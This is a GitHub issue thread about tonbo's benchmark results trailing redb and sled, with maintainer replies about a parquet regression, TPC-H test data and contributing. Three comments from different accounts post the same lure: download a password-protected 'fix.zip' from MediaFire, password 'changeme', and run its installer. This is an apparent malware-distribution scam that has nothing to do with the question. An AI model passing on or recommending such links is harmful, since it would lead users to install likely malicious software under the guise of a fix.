### ISSUE TITLE
2.2x lower than redb and sled？

### ISSUE THREAD

**Issue by lixiaoyong12** [tonbo-io/tonbo#112] opened 2024-08-28 01:34 UTC
## Question
The bench test case is run in the Windows 10（x86,intel i7） environment. The TONBO performance in all scenarios is not higher than that in redb and sled (no tests are performed in rocksdb). How to set the TONBO performance to 2.2 times on the official website?

![image](https://github.com/user-attachments/assets/0a364ad6-acb5-4dec-aa9a-6d86643d63ba)

tonbo: Bulk loaded 10000 items in 201807ms
tonbo: Wrote 10000 individual items in 204077ms
tonbo: Wrote 10000 individual items (4 threads) in 208614ms
tonbo: Wrote 10000 individual items (8 threads) in 206650ms
tonbo: Wrote 100 x 100 items in 203021ms
tonbo: Wrote 100 x 100 items (4 threads) in 206750ms
tonbo: Wrote 100 x 100 items (8 threads) in 202160ms
tonbo: Random range read 400000 elements in 119334ms
tonbo: Random range read 400000 elements in 118964ms
tonbo: Random range projection read 400000 elements in 29907ms
tonbo: Random range projection read 400000 elements in 29854ms
tonbo: Random range projection reads (4 threads) 400000 elements in 27135ms
tonbo: Random range projection reads (8 threads) 400000 elements in 27110ms
tonbo: Random range projection reads (16 threads) 400000 elements in 25959ms
tonbo: Random range projection reads (32 threads) 400000 elements in 26283ms
tonbo: Removed 5000 items in 100255ms
redb: Bulk loaded 10000 items in 206787ms
redb: Wrote 10000 individual items in 223423ms
redb: Wrote 10000 individual items (4 threads) in 219312ms
redb: Wrote 10000 individual items (8 threads) in 219379ms
redb: Wrote 100 x 100 items in 207569ms
redb: Wrote 100 x 100 items (4 threads) in 207385ms
redb: Wrote 100 x 100 items (8 threads) in 199280ms
redb: Random range read 400000 elements in 9646ms
redb: Random range read 400000 elements in 8733ms
redb: Random range projection read 400000 elements in 8669ms
redb: Random range projection read 400000 elements in 8661ms
redb: Random range projection reads (4 threads) 400000 elements in 8661ms
redb: Random range projection reads (8 threads) 400000 elements in 8657ms
redb: Random range projection reads (16 threads) 400000 elements in 8326ms
redb: Random range projection reads (32 threads) 400000 elements in 8349ms
redb: Removed 5000 items in 100800ms
sled: Bulk loaded 10000 items in 205312ms
sled: Wrote 10000 individual items in 221942ms
sled: Wrote 10000 individual items (4 threads) in 207565ms
sled: Wrote 10000 individual items (8 threads) in 207317ms
sled: Wrote 100 x 100 items in 204311ms
sled: Wrote 100 x 100 items (4 threads) in 201806ms
sled: Wrote 100 x 100 items (8 threads) in 193332ms
sled: Random range read 400000 elements in 9731ms
sled: Random range read 400000 elements in 7531ms
sled: Random range projection read 400000 elements in 7432ms
sled: Random range projection read 400000 elements in 7431ms
sled: Random range projection reads (4 threads) 400000 elements in 7445ms
sled: Random range projection reads (8 threads) 400000 elements in 7419ms
sled: Random range projection reads (16 threads) 400000 elements in 7137ms
sled: Random range projection reads (32 threads) 400000 elements in 7160ms
sled: Removed 5000 items in 100604ms

Before asking a question, make sure you have:

- Reviewed relevant Rust information: Google your error messages and look at official docs.
- Searched open and closed [GitHub issues](https://github.com/tonbo-io/tonbo/issues)

**Comment by PiaoR** [comment] 2024-08-28 05:08
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ethe** [comment] 2024-08-28 05:40
Tonbo is unstable and has regression in latest commits, according to our measurement, it is caused by the implementation of parquet, we are working on the reproducable benchmarks, please follow us to get the latest info.
![flamegraph (11) (1)](https://github.com/user-attachments/assets/91fb67c1-a981-4efb-8808-56bf80f647af)

**Comment by HeinousAgenda38** [comment] 2024-08-28 07:23
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment] 2024-08-28 07:47
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KKould** [comment] 2024-08-29 03:33
Thank you for your feedback. 

The benchmark code described in the issue has fallen behind. You can try the latest code. Our current main comparison object is rocksdb (the current write performance is the same as rocksdb. In some cases, the projection scan will be faster than rocksdb because projection pushdown), please compare with rocksdb after updating

**Comment by lixiaoyong12** [comment] 2024-08-29 04:04
How to fix this mistake
![image](https://github.com/user-attachments/assets/0238883e-0cb0-4608-8020-c3db48a9fe14)

**Comment by KKould** [comment] 2024-08-29 07:11
> How to fix this mistake ![image](https://private-user-images.githubusercontent.com/34184204/362528023-0238883e-0cb0-4608-8020-c3db48a9fe14.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5MTU2NTIsIm5iZiI6MTcyNDkxNTM1MiwicGF0aCI6Ii8zNDE4NDIwNC8zNjI1MjgwMjMtMDIzODg4M2UtMGNiMC00NjA4LTgwMjAtYzNkYjQ4YTlmZTE0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjklMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI5VDA3MDkxMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTUyNTUzNTY4NjFiN2JjMzU1NDFlNzExODc3N2M3YTE2ZDVhMjhiZjdkMDQwZDkyMTM0YWIzNzA2MTNiYjVjZGEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.ZmFX_pp5C1R4hC-EvJ-ffNPaN6VRmUdeuFIg1C-ACDc)

We have not encountered such a problem (macos & window), please go to https://github.com/rust-rocksdb/rust-rocksdb to see if there are related issues

**Comment by lixiaoyong12** [comment] 2024-08-30 03:50
> Thank you for your feedback.
> 
> The benchmark code described in the issue has fallen behind. You can try the latest code. Our current main comparison object is rocksdb (the current write performance is the same as rocksdb. In some cases, the projection scan will be faster than rocksdb because projection pushdown), please compare with rocksdb after updating
How is data generated in read_bench?
![image](https://github.com/user-attachments/assets/9515e4a8-92bb-4455-9829-31256f4756bc)

**Comment by lixiaoyong12** [comment] 2024-08-30 07:01
> > Thank you for your feedback.
> > The benchmark code described in the issue has fallen behind. You can try the latest code. Our current main comparison object is rocksdb (the current write performance is the same as rocksdb. In some cases, the projection scan will be faster than rocksdb because projection pushdown), please compare with rocksdb after updating
> > How is data generated in read_bench?
> > ![image](https://private-user-images.githubusercontent.com/34184204/363034764-9515e4a8-92bb-4455-9829-31256f4756bc.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUwMDA0NDMsIm5iZiI6MTcyNTAwMDE0MywicGF0aCI6Ii8zNDE4NDIwNC8zNjMwMzQ3NjQtOTUxNWU0YTgtOTJiYi00NDU1LTk4MjktMzEyNTZmNDc1NmJjLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MzAlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODMwVDA2NDIyM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWNmODlmNWE0Nzc5MGE0NmYyNzQ4M2U5N2YwNjA4Yzk3MjA0ZmM5N2MwOTFmNDMyODhhZWM5ZTllNDJlOWQ1ZDMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.JWMB7hoEVurX-K_RvuwD-8hkCoVN1EOm4m-qIN0dkMY)

**Comment by lixiaoyong12** [comment] 2024-09-02 02:50
@KKould I am very interested in this project. Do you have any documents designed for me to quickly understand and participate in this project?

**Comment by KKould** [comment] 2024-09-03 09:01
> > Thank you for your feedback.
> > The benchmark code described in the issue has fallen behind. You can try the latest code. Our current main comparison object is rocksdb (the current write performance is the same as rocksdb. In some cases, the projection scan will be faster than rocksdb because projection pushdown), please compare with rocksdb after updating
> > How is data generated in read_bench?
> > ![image](https://private-user-images.githubusercontent.com/34184204/363034764-9515e4a8-92bb-4455-9829-31256f4756bc.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUzNTQzMjksIm5iZiI6MTcyNTM1NDAyOSwicGF0aCI6Ii8zNDE4NDIwNC8zNjMwMzQ3NjQtOTUxNWU0YTgtOTJiYi00NDU1LTk4MjktMzEyNTZmNDc1NmJjLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MDMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTAzVDA5MDAyOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWMzZTE5ZjYwY2MwZDIzNzdmZmU0NmZhNzcyMTA0NTBhODA5ZjhlYmRlM2VhMzkxN2UwYzU5ZTdiMGYwNTlkNGEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.pkjNeHB61Qc19vK2UtiorCYbN4HmET76wNOO0Aow7Hs)

This tbl file is generated by tpch's dbgen, we use sf 1000 as the factor for testing

**Comment by KKould** [comment] 2024-09-03 09:05
> @KKould I am very interested in this project. Do you have any documents designed for me to quickly understand and participate in this project?

@lixiaoyong12 Unfortunately, tonbo is currently in its early stages and we have not invested much energy in documentation. I am very happy to discuss the technical details of Tonbo with you. You are welcome to come to discord to ask questions.

If you want to get involved, welcome to see what issues are within your capabilities

**Comment by lixiaoyong12** [comment] 2024-09-04 01:01
About WASM Support Design

**Comment by lixiaoyong12** [comment] 2024-09-06 04:06
Please send a verification result.

**Comment by ethe** [comment] 2024-11-15 13:52
We are working on parquet lru cache #193 and #215 , performance would be back to expectation if it is merged, thanks for your feedback! WASM is a too complicated topic, we choose implementing it by ourselves, you are ablt to checkout #118 to get more info.

**Closed by ethe** 2024-11-15 13:52 UTC
Labels: question
